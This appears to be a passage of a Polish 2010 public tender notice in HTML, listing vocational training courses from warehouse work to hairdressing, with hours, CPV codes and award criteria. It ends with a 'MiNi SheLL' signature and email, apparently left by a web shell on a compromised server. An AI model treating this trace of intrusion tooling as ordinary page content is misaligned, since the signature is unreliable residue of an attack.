<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 200 godzin, obejmujące zagadnienia dotyczące m.in: bhp, ppoż., budowy i wyposażenia magazynu, technologii i organizacji prac magazynowych, zastosowania systemów komputerowych w gospodarce magazynowej, fakturowania komputerowego, obsługi kas fiskalnych i terminala płatniczego, obsługi wózków widłowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs-szkolenie: Opiekun osób zależnych (starszych, niepełnosprawnych oraz dzieci) z elementami 
języka niemieckiego  dla  13 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 220 godzin, obejmujące zagadnienia dotyczące m.in: problemów społecznych osób starszych i niepełnosprawnych,  diagnozy potrzeb osób starszych, niepełnosprawnych oraz dzieci,  roli opiekuna, podstawowych wiadomości o zdrowiu, udzielanie pierwszej pomocy przed medycznej, rozwiązywaniu problemów opiekuńczych osób starszych i niepełnosprawnych oraz dzieci , higieny,  wychowania dziecka w środowisku instytucjonalnym, stosowanie zabaw i gier wpływających na rozwój dziecka a także elementy języka niemieckiego w ilości 40 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs-szkolenie: Operator wózków jezdniowych dla  5 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 88 godzin, obejmujące zagadnienia dotyczące m.in: budowy wózków jezdniowych, , bhp., ich obsługi i nauka manewrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs-szkolenie: Operator koparko - ładowarki  dla  6  osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 202  godzin, obejmujące zagadnienia dotyczące m.in: budowy koparko-ładowarki, technologii robót, bhp., obsługi i manewrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs-szkolenie: Betoniarz - zbrojarz  dla  2  osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 286  godzin, obejmujące zagadnienia dotyczące m.in: dokumentacji technicznej,  bhp., podstawowych pojęć w budownictwie, przygotowania, transportu i układania mieszanki betonowej,  składania, montażu prętów zbrojeniowych, wykonywania zbrojeń i betonowania elementów budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Kurs-szkolenie: Księgowość komputerowa z modułem kadry - płace  dla  7  osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne  w ilości 215  godzin, obejmujące zagadnienia dotyczące m.in: bhp., obsługi systemów operacyjnych Windows, Excel, Word, Power Point, obsługi Internetu, zagadnień prawnych, podstaw rachunkowości, sporządzania i opracowywania dokumentów księgowych, ewidencjonowania zdarzeń gospodarczych na kontach księgowych, sporządzania sprawozdań finansowych,  zasad ustalania wynagrodzeń, rozliczanie składek,  sporządzanie i przekazywanie dokumentów ubezpieczeniowych, zasiłków, ustalania kapitału początkowego, obsługa programów komputerowych finansowych i płacowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kurs-szkolenie: Grafik komputerowy dla 5  osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić:
-	szkolenie teoretyczne i praktyczne w ilości 180 godzin obejmujące zagadnienia dotyczące m.in.: bhp, zapoznania z programami komputerowymi, podstaw rysunku wektorowego, wstawiania i modyfikowania tekstu, metod zaznaczania obrazu, pracy z obrazkiem, rodzajów kompozycji i zasad komponowania, projektowania znaków, wykonywania kompozycji kolorystycznych i literniczych, projektowania i opracowywanie plakatów i billboardów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kurs-szkolenie: Bukieciarz - florysta dla 2 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Wykonawca winien zapewnić: - szkolenie teoretyczne i praktyczne w ilości 180 godzin obejmujące zagadnienia dotyczące m.in.: gatunków roślin, technik utrwalania roślin,  dobór materiału do dekoracji na różne okazje, wykonywania wiązanek okolicznościowych, fantazyjnych, wieńców, stroików..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Kurs-szkolenie: Fryzjer dla 3 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić: 
-	szkolenie teoretyczne i praktyczne w ilości 210 godzin obejmujące zagadnienia dotyczące, m.in.: materiałoznawstwa, technologii, higieny zawodowej, bhp, rodzajów fryzur, wykonywania zabiegów fryzjerskich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Kurs-szkolenie: Wizażysta oraz stylizacja paznokci dla 2 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca winien zapewnić: 
-	szkolenie teoretyczne i praktyczne w ilości 210 godzin obejmujące zagadnienia dotyczące, m.in.: higieny i bhp., dermatologii,  rozpoznawania i analizy typu urody, rodzajów skóry, technik korygowania  niedoskonałości, planowanie wyglądu klienta, wykonywania różnych rodzajów makijażu, chorób paznokci i  ich zapobiegania, technik pracy z akrylem i żelem, tipsy, zabiegów naprawczych i korygujących płytki paznokcia i dłonie, wykonywanie zdobień paznokci różnymi technikami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com